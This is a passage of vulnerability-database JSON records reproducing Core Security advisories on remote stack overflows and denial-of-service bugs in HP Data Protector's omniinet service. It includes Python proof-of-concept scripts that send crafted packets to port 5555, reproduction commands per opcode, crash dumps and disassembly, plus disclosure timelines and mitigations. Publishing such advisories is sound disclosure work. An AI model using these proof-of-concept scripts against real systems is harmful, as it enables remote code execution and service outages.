sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\\xff\\xfe\\x32\\x00\\x00\\x00"]\r\n\r\nfor s in args:\r\n packet.append("\\x20\\x00" + s + "\\x00\\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71823"}, {"lastseen": "2017-11-19T15:44:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71826", "id": "SSV:71826", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the "data protector inet" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for "AA"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 85D2 TEST EDX,EDX\r\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\r\n[...]\r\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\r\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\r\n0041D1FD |. 85C9 |TEST ECX,ECX\r\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\r\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\r\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\r\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\r\nto the stack\r\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D216 |. 83C0 02 |ADD EAX,2\r\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\r\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\r\n0041D21F |. 83C1 02 |ADD ECX,2\r\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\r\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\r\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\r\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n0041D232 |. 8BE5 MOV ESP,EBP\r\n0041D234 |. 5D POP EBP\r\n0041D235 \\. C3 RETN\r\n \r\n- -----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-06:\r\nCore Security Technologies notifies the HP team of the vulnerabilities\r\nand provides the technical details. Publication date is temporarily set\r\nto July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0606 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\r\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\r\n=zHon\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71826"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:29", "description": "", "published": "2011-06-30T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2011.0514", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-30T00:00:00", "id": "PACKETSTORM:102673", "href": "https://packetstormsecurity.com/files/102673/Core-Security-Technologies-Advisory-2011.0514.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMultiple vulnerabilities in HP Data Protector \n \n \n1. *Advisory Information* \n \nTitle: Multiple vulnerabilities in HP Data Protector \nAdvisory ID: CORE-2011-0514 \nAdvisory URL: \nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities \nDate published: 2011-06-29 \nDate of last update: 2011-06-29 \nVendors contacted: HP \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120], Null pointer dereference \n[CWE-476], Improper input validation [CWE-20] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515 \n \n \n3. *Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. Multiple vulnerabilities have \nbeen found in HP Data Protector that could allow a remote attacker to \nexecute arbitrary code and lead to denial of service conditions. The \nvulnerabilities are triggered by sending a request to port 5555 of a \nhost running the \"data protector inet\" service, part of HP Data \nProtector. The request has several parameters, including an opcode. By \nsending requests with specially crafted parameters, the different bugs \ncan be triggered. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to these issues. \nHP has provided the following procedure to mitigate these vulnerabilities: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. \n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered by Oren Isacson from Core Security \nTechnologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the different bugs. \n \n/----- \nimport struct, socket, sys \n \ntarget = sys.argv[1] \nopcode = sys.argv[2] \nstring_lenght = int(sys.argv[3]) \nargs_number = int(sys.argv[4]) \nlong_argument = int(sys.argv[5]) \n \ndef to_wc(x): \nreturn ''.join([\"%s\\x00\" % c for c in x] ) \n \nargs = [to_wc('a')] * args_number \nargs[5] = to_wc(opcode) \nargs[long_argument] = 'a' * string_lenght \npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"] \n \nfor s in args: \npacket.append(\"\\x20\\x00\" + s + \"\\x00\\x00\") \n \npacket = ''.join(packet) \npacket = struct.pack(\">L\", len(packet)) + packet \n \nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \nsock.connect((target, 5555)) \nsock.send(packet) \n \n- -----/ \n \n \nIn the following sections, we give the command line details to reproduce \neach bug, and a brief description of the effect produced. \n \n \n8.1. *Vulnerability 1. Opcodes 20 y 28.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\" \nThis causes a stack overflow. \n \n/----- \n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3 \n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52 \n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35 \n61616161 00000000 00000000 00000000 00000000 0x61616161 \n \n- -----/ \n \n \n \n8.2. *Vulnerability 2. Opcode 11.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 10000 30 17\" \nA stack overflow is produced within the function swprintf, called from \nposition 0x00411A72. \n \n \n8.3. *Vulnerability 3. Opcode 35.* \n \n[CVE-2011-1865] This vulnerability can be reproduced with any of the \nfollowing commands: \n\"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\" \nA stack overflow is produced within the function swprintf, called from \nposition 0041367F. \n \n \n8.4. *Vulnerability 4. Opcode 42.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 42 10000 30 9\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A9BA. \n \n \n8.5. *Vulnerability 5. Opcode 46.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 46 10000 30 17\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040A708. \n \n \n8.6. *Vulnerability 6. Opcode 27.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 27 10000 30 3\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040AD53. \n \n \n8.7. *Vulnerabilidad 7. Opcode 17.* \n \n[CVE-2011-1865] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 17 10000 30 6\" \nA stack overflow is produced by calling the function swprintf from \nposition 0x0040FC05. \n \n \n8.8. *Vulnerability 8. Opcode 11.* \n \n[CVE-2011-1514] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 11 1 7 6\" \nThis causes a null pointer dereference. \n \n/----- \neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 \nedi=00000000 \neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac \npe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00010212 \nomniinet+0x7ed0: \n00407ed0 8b10 mov edx,[eax] \nds:0023:00000014=???????? \n \n \n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0 \n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e \n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b \n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02 \n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c \n007cffb4 7c80b713 00156490 00000000 0012e7f8 \nADVAPI32!CryptVerifySignatureW+0x29 \n007cffec 00000000 77df3519 00156490 00000000 \nkernel32!GetModuleFileNameA+0x1b4 \n \n- -----/ \n \n \n8.9. *Vulnerability 9. Opcode 20.* \n \n[CVE-2011-1515] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 20 1 7 6\" \nThe process terminates without generating an exception, resulting in a \ndenial of service condition. \n \n \n9. *Report Timeline* \n \n. 2011-06-02: \nCore Security Technologies notifies HP Security Alert team of the \nvulnerabilities. Publication date is temporarily set to July 5th, 2011. \n \n. 2011-06-06: \nVendor acknowledges receipt. \n \n. 2011-06-06: \nCore sends technical details to the vendor. \n \n. 2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 2011-06-29: \nAdvisory CORE-2011-0514 is published. \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under 